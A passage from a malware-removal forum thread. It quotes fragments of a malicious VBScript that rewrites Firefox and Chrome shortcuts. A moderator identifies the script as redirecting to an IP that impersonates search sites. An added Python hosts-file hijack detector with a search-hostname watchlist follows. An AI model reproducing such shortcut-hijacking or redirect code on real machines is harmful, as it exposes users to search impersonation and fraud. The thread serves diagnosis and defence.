End If 'uz Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs

Reply #13 January 24, 2015, 04:44:22 PM

Curson

  • Global Moderator
Re: windows/SysWOW64/rundll32.exe halp me ?
« Reply #13 on: January 24, 2015, 04:44:22 PM »
Hi tomfullerton,

This script is used to make redirections to IP 69.162.120.131 which is an attempt to impersonate known search sites.
Since you have started a new topic at Bleepingcomputer, please continue with Johnny Computer there.

Regards.
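The hosts-file tampering Curson describes, as an added detection example that is not code from the thread: it parses hosts-file text and flags watched search hostnames that are pinned to a non-loopback, non-unspecified address, grouping them by address so one IP capturing many search domains stands out. The SEARCH_HOSTS watchlist, the sample hosts text and the 203.0.113.5 address are constructed for the example.

```python
"""Hosts-file hijack check for the search-redirect pattern in the posted script.

Added example, not code from the thread. The script appends lines such as
"69.162.120.131 www.google.com" to the hosts file; this flags watched search
hosts pinned to a non-loopback, non-unspecified address and groups them by
address. Sample hosts text is constructed (203.0.113.5 is a TEST-NET address).
"""
import ipaddress
from collections import defaultdict
# Hostnames the posted script rewrites; extend with your own watchlist.
SEARCH_HOSTS = {
    "www.google.com", "www.bing.com", "search.yahoo.com", "www.yahoo.com",
    "www.aol.com", "search.aol.com", "www.ask.com", "search.avg.com",
    "www.google.co.uk", "www.google.ca", "www.google.co.in",
}

def parse_hosts(text):
    """Yield (ip_address, hostname) pairs, skipping comments, blanks and bad lines."""
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()  # strip trailing comment, tokenize
        if not fields:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first token is not a valid IPv4/IPv6 address
        for name in fields[1:]:
            yield ip, name.lower()

def find_hijacks(text):
    """Return {ip: sorted hijacked search hostnames}; loopback/0.0.0.0 are ignored."""
    hits = defaultdict(set)
    for ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue  # localhost aliases and ad-block style sinkholes are benign
        if name in SEARCH_HOSTS:
            hits[str(ip)].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

SAMPLE_HOSTS = """# constructed sample
127.0.0.1 localhost
::1 localhost
0.0.0.0 ads.example.invalid   # ad-block style entry, not a hijack
203.0.113.5 www.google.com www.bing.com
203.0.113.5 search.yahoo.com
"""

if __name__ == "__main__":
    for ip, names in find_hijacks(SAMPLE_HOSTS).items():
        print(f"{ip} captures {len(names)} search hosts: {', '.join(names)}")
```

On a live Windows machine, feed it the contents of %windir%\System32\drivers\etc\hosts; any address returned is one to investigate, and the Run-key scripts the batch file registers are the likely writer.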